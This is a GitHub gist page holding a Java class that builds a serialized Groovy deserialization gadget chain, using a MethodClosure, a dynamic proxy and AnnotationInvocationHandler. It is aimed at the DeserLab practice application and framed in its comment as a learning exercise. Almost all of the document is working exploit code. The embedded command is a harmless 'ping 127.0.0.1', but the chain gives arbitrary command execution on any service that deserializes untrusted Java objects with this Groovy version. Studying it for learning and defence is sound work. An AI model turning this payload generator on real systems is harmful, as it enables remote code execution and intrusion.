Java class to generate a Groovy serialized payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
DiabloHorn - https://diablohorn.com | |
For learning purposes we build the groovy payload ourselves instead of using | |
ysoserial. This helps us better understand the chain and the mechanisms | |
involved in exploiting this bug. | |
compile with: | |
javac -cp <path to groovy lib> ManualPayloadGenerate.java | |
Example: | |
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java | |
Execute: | |
java -cp .:DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate > payload_manual.bin | |
References, including those we borrowed code from | |
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ | |
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html | |
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html | |
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html | |
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ | |
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478 | |
https://www.youtube.com/watch?v=VviY3O-euVQ | |
http://wouter.coekaerts.be/2015/annotationinvocationhandler | |
http://www.baeldung.com/java-dynamic-proxies | |
https://stackoverflow.com/questions/37068982/how-to-execute-shell-command-with-parameters-in-groovy | |
https://www.sourceclear.com/registry/security/remote-code-execution-through-object-deserialization/java/sid-1710/technical | |
*/ | |
//regular imports | |
import java.io.IOException; | |
import java.io.ByteArrayOutputStream; | |
import java.io.ObjectOutputStream; | |
import java.io.PrintStream; | |
import java.util.Map; | |
//reflection imports | |
import java.lang.reflect.Constructor; | |
import java.lang.reflect.InvocationHandler; | |
import java.lang.reflect.InvocationTargetException; | |
import java.lang.reflect.Proxy; | |
//library specific imports | |
import org.codehaus.groovy.runtime.ConvertedClosure; | |
import org.codehaus.groovy.runtime.MethodClosure; | |
public class ManualPayloadGenerate{ | |
public static void main(String[] args) throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException, InvocationTargetException { | |
Object groovyExploit = getGroovyExploitObject(); | |
serializeToByteArray(groovyExploit); | |
} | |
public static void serializeToByteArray(Object object) throws IOException { | |
PrintStream out = System.out; | |
final ObjectOutputStream objOut = new ObjectOutputStream(out); | |
objOut.writeObject(object); | |
} | |
public static Object getGroovyExploitObject() throws ClassNotFoundException, InstantiationException, IllegalAccessException, InvocationTargetException { | |
final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("ping 127.0.0.1", "execute"), "entrySet"); | |
//here we proxy all calls to methods | |
final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerate.class.getClassLoader(), new Class[] {Map.class}, closure); | |
//this is the first class that will be deserialized | |
String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler"; | |
//access the constructor of the AnnotationInvocationHandler class | |
final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0]; | |
//normally the constructor is not accessible, so we need to make it accessible | |
constructor.setAccessible(true); | |
//this is were we set the initial chain for exploitation | |
InvocationHandler secondInvocationHandler = (InvocationHandler) constructor.newInstance(Override.class, map); | |
return secondInvocationHandler; | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment